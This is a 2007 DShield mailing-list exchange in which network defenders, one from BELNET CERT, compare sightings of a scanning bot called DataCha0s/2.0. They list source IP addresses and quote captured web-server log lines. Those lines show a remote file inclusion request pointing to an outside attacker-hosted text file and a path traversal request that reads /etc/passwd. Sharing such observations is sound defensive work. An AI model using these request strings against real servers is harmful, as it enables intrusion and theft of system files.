[Dshield] DataCha0s/2.0?

Seth Tregenna seth.tregenna at googlemail.com
Thu Apr 26 13:45:26 GMT 2007


I've seen similar to Koen coming from:

2007-04-10 - 208.51.27.144
2007-04-17 - 202.134.73.145, 194.116.202.26
2007-04-19 - 216.75.35.19
2007-04-20 - 200.166.228.75
2007-04-23 - 133.3.8.135
2007-04-24 - 216.143.219.14
2007-04-25 - 217.160.246.125

Nothing today so far though.....

On 26/04/07, Koen Van Impe <koen.vanimpe at belnet.be> wrote:
>
> Ryan McConigley wrote:
> > Hi, I'm just curious, but has anyone else noticed a sudden rush of
> > attempted web exploits from a script/bot that identifies itself as
> > DataCha0s/2.0?
> >
>
> Yes.
>
> It looks like a bot that scans for vulnerable Perl AWStats installs
> (throw DataCha0s in Google and you'll get a number of interesting hits).
>
> We see similar attempts coming from 133.3.8.135, 217.174.240.113,
> 72.2.4.176, 203.89.187.231, 217.160.246.125
> with requests like this:
>
> [23/Apr/2007:05:26:32 +0200] "GET
> /index.php?module=http://www.regimesyndicate.org/powned.txt? HTTP/1.0"
> 200 2306 "-" "DataCha0s/2.0"
> or
> [26/Apr/2007:02:58:28 +0200] "GET
>
> /index.php?module=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
> HTTP/1.0" 500 534 "-" "DataCha0s/2.0"
>
>
> --
> Koen Van Impe - BELNET CERT
> koen.vanimpe at belnet.be
> PGP Key Id 0xED12AD79
> Contact: http://cert.belnet.be/
>
>
> _________________________________________
>
> SANS 2007 March 29 - April 6 in San Diego, CA offers 52 Courses
> taught by our top rated instructors plus a huge vendor tools expo.
> Register Today! http://www.sans.org/info/2501 (BROCHURECODE: ISC)
>
>


More information about the list mailing list